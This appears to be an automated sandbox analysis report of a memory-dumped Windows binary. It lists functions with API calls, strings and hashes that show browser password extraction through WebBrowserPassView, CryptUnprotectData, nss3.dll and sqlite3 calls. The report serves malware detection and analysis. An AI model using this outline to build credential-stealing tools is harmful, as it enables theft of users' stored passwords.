                                                                                                    • Opcode Fuzzy Hash: 16de4267e2e02615b86f59db3db7832feff9f3efdab04feda918f8b373e94b10
                                                                                                    • Instruction Fuzzy Hash: 35C092F02502017EFF208B10AD0AF37295DD780700F1084207F00E40E0D2A14C108924
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408915, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: cc600ab007c08f49ce289d8e9d1162d3a27d64414d35c3108f3b8bff292c20eb
                                                                                                    • Instruction ID: b7700e028cf616c769acb86327e69b4817dd212da86bc7666a08a7491cb95801
                                                                                                    • Opcode Fuzzy Hash: cc600ab007c08f49ce289d8e9d1162d3a27d64414d35c3108f3b8bff292c20eb
                                                                                                    • Instruction Fuzzy Hash: 89C04CB15116014BE7305E15C50472272D49F10727F304C1DA4D192481DB78D4408514
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004120B1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,0040A1E8,00000000,00410988,?,?,?,?,?,00403273,?), ref: 004120BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4922243643bb7f5cfcd66b829d0e22ab2f9adb80a01b86d0a2882136df133123
                                                                                                    • Instruction ID: 18e927b0b37a6a2cbe4f823544bb0f732ccaa32cd953ce830f029f0159122272
                                                                                                    • Opcode Fuzzy Hash: 4922243643bb7f5cfcd66b829d0e22ab2f9adb80a01b86d0a2882136df133123
                                                                                                    • Instruction Fuzzy Hash: B0C04C751107018BE7218B12D94D763B7E8BB50317F40C8589596C5860D77CE4A4CE18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044362B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044363C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 45c0ba124e5d60b8f000646315db4bd640e8b181e1aee3ae5d3dc1748d655bc3
                                                                                                    • Instruction ID: 14f6b3eb4122635c99e1dcc61e9aa8af6781f8fcd24479f0f4a0f234cfb32b45
                                                                                                    • Opcode Fuzzy Hash: 45c0ba124e5d60b8f000646315db4bd640e8b181e1aee3ae5d3dc1748d655bc3
                                                                                                    • Instruction Fuzzy Hash: 40C048BA5103119BEB218F21FE9E76236A8B762B1BF904226A400861A2D7B8C415CE5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004087EB, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,004086FF,?,00000000,00000000,?,00410F55,?), ref: 004087F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: d4a7a4f163295a32b750de54fc593c96ad5b87a50642aa076e63cfe88768b1c6
                                                                                                    • Instruction ID: 1e8c5803b04f74fffedbc8c58b95b6f851ee57838ae2b9b16d22c25c6181267e
                                                                                                    • Opcode Fuzzy Hash: d4a7a4f163295a32b750de54fc593c96ad5b87a50642aa076e63cfe88768b1c6
                                                                                                    • Instruction Fuzzy Hash: 5DC09B351105055BD22C5F34DD5D4167791BF953343740F5CA0F3D20F1DB3484428504
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412852, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004127CC,00000000), ref: 00412861
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: 1a542663f29d00e0d1bc6029a2a52bb6146f49dc43cf8d8a83b1906e54a95857
                                                                                                    • Instruction ID: 83e1b1e105f0d6a658dce0aee3230888731d57f3c5b8863e64e60631655fa57f
                                                                                                    • Opcode Fuzzy Hash: 1a542663f29d00e0d1bc6029a2a52bb6146f49dc43cf8d8a83b1906e54a95857
                                                                                                    • Instruction Fuzzy Hash: 16C09B31154342ABD7019F20CC09F1B7A95BB95705F114C2D7161D40E0C75140749715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041243B, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412BD7,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 0041244E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 6b8e04a71da40794f873cb7096678f80f71298d865629b09b3c29e7db783fac2
                                                                                                    • Instruction ID: b2c20a18376542d5682fb17283ca89c734ed7f0c9f0f5ea0e447df4c75c9e2df
                                                                                                    • Opcode Fuzzy Hash: 6b8e04a71da40794f873cb7096678f80f71298d865629b09b3c29e7db783fac2
                                                                                                    • Instruction Fuzzy Hash: B4C09239548301BFDE128F40FE0AF0ABBA2BBC8B09F104818B384240B182728824EB17
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407813, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040B086,?,0040B13D,00000000,?,00000000,00000208,?), ref: 00407817
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 64aab50e0e008a10ba06721fb5a17874625c9c5a505daebb63a50ea2382d28e4
                                                                                                    • Instruction ID: 5169a066f0b7b25276a5b31e18b9ae9fc9c4e82853b6a75bf99b7d82fbab6c91
                                                                                                    • Opcode Fuzzy Hash: 64aab50e0e008a10ba06721fb5a17874625c9c5a505daebb63a50ea2382d28e4
                                                                                                    • Instruction Fuzzy Hash: AFB012792100004BCB0807349C4944E75505FC6631720473CB033C00F0E730CCA0BA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00419F51, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a9fdbbfdfcd33d43891f9cce9a230f72867deecba2729148b161d902e107276
                                                                                                    • Instruction ID: 89e1cffbbefa515b5592ab1c5ab1e88deadcb1ce49f55ade0647cca51df20a4d
                                                                                                    • Opcode Fuzzy Hash: 6a9fdbbfdfcd33d43891f9cce9a230f72867deecba2729148b161d902e107276
                                                                                                    • Instruction Fuzzy Hash: 2131BC31A01206EFCF14AF15C8407DAB7A1BF08354F15412BF815AB240DB39ECE19B9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405A09, Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081463915-0
                                                                                                    • Opcode ID: 849a2817c698e94dd7e2bad02aeeeff5d4d5a6905090b556ed1272c11eb0538c
                                                                                                    • Instruction ID: faa7c7b2be3f82b3554ebf80efbe40126b4039e93506643c1f66e73f13396486
                                                                                                    • Opcode Fuzzy Hash: 849a2817c698e94dd7e2bad02aeeeff5d4d5a6905090b556ed1272c11eb0538c
                                                                                                    • Instruction Fuzzy Hash: 1B114C71600A09AFCB10DFA9D8C199BB7F8FF04314B10463EE55AE7241EB35E9459F68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004050C9, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405149: CloseHandle.KERNEL32(000000FF,004050D9,00000000,?,00408E58,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,0040933D,?,00409515,000000FF), ref: 00405151
                                                                                                      • Part of subcall function 0040740F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00442ACA,00000000,?,00000000,00000000,00410EBE,?,?), ref: 00407421
                                                                                                    • GetLastError.KERNEL32(00000000,?,00408E58,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,0040933D,?,00409515,000000FF,00000000,00000104), ref: 00405136
                                                                                                      • Part of subcall function 00407E5E: ReadFile.KERNELBASE(00000000,00000000,00442B08,00000000,00000000,?,?,00442B08,00000000,00000000), ref: 00407E75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2136311172-0
                                                                                                    • Opcode ID: 9a70a8c935ec2004e9944b8328e3f9f373a28781b7020156bacec46d2246e9da
                                                                                                    • Instruction ID: dfacf37c3f88ba9c5fba9e8db8f712c0484ee15bccd579af205ba02ad23bae08
                                                                                                    • Opcode Fuzzy Hash: 9a70a8c935ec2004e9944b8328e3f9f373a28781b7020156bacec46d2246e9da
                                                                                                    • Instruction Fuzzy Hash: 520181B1815A019ED7206F30DC057A777E8DF11355F10893FE196EA2C1EB7C98818E6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004088FC, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408915: ??3@YAXPAX@Z.MSVCRT ref: 0040891C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408905
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1936579350-0
                                                                                                    • Opcode ID: 38378ef6b0159755ca86fb6c7a9aa963f5baf5acb71e9b5ee7290fd7b79e4fbe
                                                                                                    • Instruction ID: 30c0a5e4494ac5e009f0ea8d0af6365fb5c513553900b9d49feaec50dbbab0dc
                                                                                                    • Opcode Fuzzy Hash: 38378ef6b0159755ca86fb6c7a9aa963f5baf5acb71e9b5ee7290fd7b79e4fbe
                                                                                                    • Instruction Fuzzy Hash: DAC02B7240C2104FD710FF74350116636D4CEC2324312882FF0C0D3201E93844020344
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004082DE, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • free.MSVCRT(00000000,00408663,00000000,?,00000000), ref: 004082E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: d7533f4b740a1bdb57511d7ee42f44100548954af2d3f4ed25c3bf6ad5fec5a1
                                                                                                    • Instruction ID: 00dbae6deb6eefbca0493d842a29e62ce5be6ec8f4a1c3f339ddfb0db535c167
                                                                                                    • Opcode Fuzzy Hash: d7533f4b740a1bdb57511d7ee42f44100548954af2d3f4ed25c3bf6ad5fec5a1
                                                                                                    • Instruction Fuzzy Hash: FDC00276511B018BE7709E15C645762B3E5AF1072BFA18C5DA4D591482DBBCE4848A18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040892A, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • free.MSVCRT(00000000,0040ECEB,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 00408931
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 7e32c0ada0b3c8eb1b03758214efc17efdd0844707fdc9d01f9c1f79497ce71c
                                                                                                    • Instruction ID: 933197d7d03c60db17a128173dfee98db6182bf67d0f32fd6cf008c57ab37f48
                                                                                                    • Opcode Fuzzy Hash: 7e32c0ada0b3c8eb1b03758214efc17efdd0844707fdc9d01f9c1f79497ce71c
                                                                                                    • Instruction Fuzzy Hash: 86C002B2910B019FEB209E55C505762B3E4AF1077BFA18C1DA4D591581DBBCE4448A18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413443, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 2e419ae622b0e7361406ec90721a221e9df4a10fb7279a853b5db7eeff2febdb
                                                                                                    • Instruction ID: 9781e56de0c1b8ddddc8d190b416029c906c249e06fe94b91164f66782cac687
                                                                                                    • Opcode Fuzzy Hash: 2e419ae622b0e7361406ec90721a221e9df4a10fb7279a853b5db7eeff2febdb
                                                                                                    • Instruction Fuzzy Hash: 35900282855501105C04A1B59D0650615090851136374074A7532956D1CE689050601C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 004163CD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 004163D6
                                                                                                      • Part of subcall function 0041549A: GetVersionExW.KERNEL32(?), ref: 004154BD
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004163FD
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00416426
                                                                                                    • LocalFree.KERNEL32(?), ref: 00416441
                                                                                                    • free.MSVCRT(?,0044B478,?), ref: 0041646F
                                                                                                      • Part of subcall function 00415533: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7601DF80,?,0041565E,?), ref: 00415551
                                                                                                      • Part of subcall function 00415533: malloc.MSVCRT ref: 00415558
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                    • Opcode ID: cee7bbbd56a49f9ec46f990127a7ea81c086f72ccd8147f132abcbbe2c6e87ee
                                                                                                    • Instruction ID: 80a52802ec0f388768b15e45c66201f1bd0bbe918a3f7be0b52c5fb48bc3574f
                                                                                                    • Opcode Fuzzy Hash: cee7bbbd56a49f9ec46f990127a7ea81c086f72ccd8147f132abcbbe2c6e87ee
                                                                                                    • Instruction Fuzzy Hash: EA11C434901128FBCB11ABA2DC4ACDF7F79EF85754B10406BF90492211D7788A80DBAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004080D9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 004080F1
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408110
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00408130
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID: .$nss3.dll$~d@
                                                                                                    • API String ID: 3541575487-3194086251
                                                                                                    • Opcode ID: 76e2d3b8298efa22f2d8e541566f0f9a8fe796c3dba08aa462b7c77b5a936dbd
                                                                                                    • Instruction ID: 6e840112e58e8be3542de06bcdd39c04d234466f2df29885027c3ba3d8ad741e
                                                                                                    • Opcode Fuzzy Hash: 76e2d3b8298efa22f2d8e541566f0f9a8fe796c3dba08aa462b7c77b5a936dbd
                                                                                                    • Instruction Fuzzy Hash: 7FF02B355005286BCF305B64EC8CAABB7BCEF85361F010176AD06A7180D7749D868AC8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004021D4, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 004021FC
                                                                                                    • _wcsicmp.MSVCRT ref: 0040222C
                                                                                                    • _wcsicmp.MSVCRT ref: 00402259
                                                                                                    • _wcsicmp.MSVCRT ref: 00402286
                                                                                                      • Part of subcall function 00408303: wcslen.MSVCRT ref: 00408316
                                                                                                      • Part of subcall function 00408303: memcpy.MSVCRT ref: 00408335
                                                                                                    • memset.MSVCRT ref: 0040262A
                                                                                                    • memcpy.MSVCRT ref: 0040265F
                                                                                                      • Part of subcall function 00403841: LoadLibraryW.KERNELBASE(crypt32.dll,?,00000000,004026A7,?,00000090,00000000,?), ref: 00403850
                                                                                                      • Part of subcall function 00403841: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403862
                                                                                                      • Part of subcall function 00403841: FreeLibrary.KERNEL32(00000000), ref: 00403885
                                                                                                    • memcpy.MSVCRT ref: 004026BB
                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 00402719
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 00402728
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                    • API String ID: 462158748-1134094380
                                                                                                    • Opcode ID: 14685ebc238a21284c56bba8d8dcb89cf5cb2df11be33e70ca24e5ef8617fb24
                                                                                                    • Instruction ID: f4b04bb22ddc39860628f6ed9ac870db7b304d54a169dd0fb2b8fb7bb36ed3b6
                                                                                                    • Opcode Fuzzy Hash: 14685ebc238a21284c56bba8d8dcb89cf5cb2df11be33e70ca24e5ef8617fb24
                                                                                                    • Instruction Fuzzy Hash: 6EF1E1208087E9C9DB32C7788D097CEBE655B23324F0443D9E1E97A2D2D7B54B85CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00442248, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00442273
                                                                                                    • wcscpy.MSVCRT ref: 0044228A
                                                                                                    • memset.MSVCRT ref: 004422BD
                                                                                                    • wcscpy.MSVCRT ref: 004422D3
                                                                                                    • wcscat.MSVCRT ref: 004422E4
                                                                                                    • wcscpy.MSVCRT ref: 0044230A
                                                                                                    • wcscat.MSVCRT ref: 0044231B
                                                                                                    • wcscpy.MSVCRT ref: 00442342
                                                                                                    • wcscat.MSVCRT ref: 00442353
                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00442362
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00442379
                                                                                                    • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 0044238C
                                                                                                    • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 0044239A
                                                                                                    • LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 004423AA
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 004423C6
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 004423D2
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 004423DF
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 004423EC
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 004423F9
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00442406
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00442413
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00442420
                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0044242D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                                                                    • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                    • API String ID: 2522319644-522817110
                                                                                                    • Opcode ID: 72097e5ad69d63eac2e02e24c1a07f10a01107ccbc2c7598e42257f238d65f60
                                                                                                    • Instruction ID: 8244c38df598931a2ec8c5da777a2a41fb428bf03fb066d8d31aa9153d20d682
                                                                                                    • Opcode Fuzzy Hash: 72097e5ad69d63eac2e02e24c1a07f10a01107ccbc2c7598e42257f238d65f60
                                                                                                    • Instruction Fuzzy Hash: 5A514FB1D00709AAEB20FFB18E49E47B6F8EF58704F5009AAF54992541E7BCE644CF18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                                                                                    • EndDialog.USER32(?,?), ref: 00401265
                                                                                                    • DeleteObject.GDI32(?), ref: 00401271
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00401296
                                                                                                    • ShowWindow.USER32(00000000), ref: 0040129F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012AB
                                                                                                    • ShowWindow.USER32(00000000), ref: 004012AE
                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,004521E0), ref: 004012BF
                                                                                                    • SetWindowTextW.USER32(?,WebBrowserPassView), ref: 004012CD
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012E5
                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                    • String ID: WebBrowserPassView
                                                                                                    • API String ID: 829165378-2171583229
                                                                                                    • Opcode ID: 42c783996f3404bf48999630fee2abf39c1ce8092be8df6d1e0130b85027202f
                                                                                                    • Instruction ID: ca5a17aed14472abec57f3bf454232483f615ce39a432f51e5bbaf2e2626abe8
                                                                                                    • Opcode Fuzzy Hash: 42c783996f3404bf48999630fee2abf39c1ce8092be8df6d1e0130b85027202f
                                                                                                    • Instruction Fuzzy Hash: 9A518075500708EBDB22AF60DC45F6E7BB5FB84341F100A7AFA52A65F0C7B4A960DB18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004424E8, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(0040B1B7,?,00000000), ref: 004424FE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00442519
                                                                                                    • GetFileVersionInfoW.VERSION(0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 00442529
                                                                                                    • VerQueryValueW.VERSION(00000000,004493C0,0040B1B7,?,0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 0044253C
                                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004493C0,0040B1B7,?,0040B1B7,00000000,?,00000000,00000000,0040B1B7,?,00000000), ref: 00442579
                                                                                                    • _snwprintf.MSVCRT ref: 00442599
                                                                                                    • wcscpy.MSVCRT ref: 004425C3
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00442673
                                                                                                    Strings
